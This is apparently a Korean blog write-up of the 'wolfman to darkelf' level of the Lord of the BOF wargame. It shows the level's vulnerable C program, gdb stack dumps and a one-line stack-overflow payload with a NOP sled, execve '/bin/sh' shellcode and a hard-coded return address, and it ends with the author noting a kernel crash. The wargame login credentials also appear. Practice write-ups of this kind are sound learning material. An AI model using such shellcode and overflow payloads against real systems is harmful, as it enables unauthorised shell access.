반응형

login : wolfman

password : love eyuna

 

 

/*
        The Lord of the BOF : The Fellowship of the BOF
        - darkelf
        - egghunter + buffer hunter + check length of argv[1]
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);
}

  이전문제와 똑같은데 check the length of argument가 추가되었다

이전문제에서 48이상 넣지 않았기때문에 그냥 똑같이 풀면될거같다,

0xbffffbe8:     0x0000000e      0x000001f9      0x00000010      0x0f8bfbff
0xbffffbf8:     0x0000000f      0xbffffc29      0x00000000      0x00000000
0xbffffc08:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffc18:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffc28:     0x38366900      0x682f0036      0x2f656d6f      0x666c6f77
0xbffffc38:     0x2f6e616d      0x706d6574      0x61616100      0x61616161
0xbffffc48:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffc58:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffc68:     0x61616161      0xbfbfbf61      0x454c00bf      0x504f5353

0xbffffc50 들고가야지

./darkelf `python -c print'"\x90"*19 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" + "\x50\xfc\xff\xbf"'`

 

kernel crashed

반응형

'Write-Up > LOB(lord of bufferoverflow)' 카테고리의 다른 글

[Lord Of BufferOverFlow] 8번 orge -> troll  (0) 2021.02.26
[Lord Of BufferOverFlow] 7번 darkelf -> orge  (0) 2021.02.26
[Lord Of BufferOverFlow] 5번 orc -> wolfman  (0) 2021.02.25
[Lord Of BufferOverFlow] 4번 goblin -> orc  (0) 2021.02.23
[Lord Of BufferOverFlow] 3번 cobolt -> goblin  (0) 2021.02.23

티스토리툴바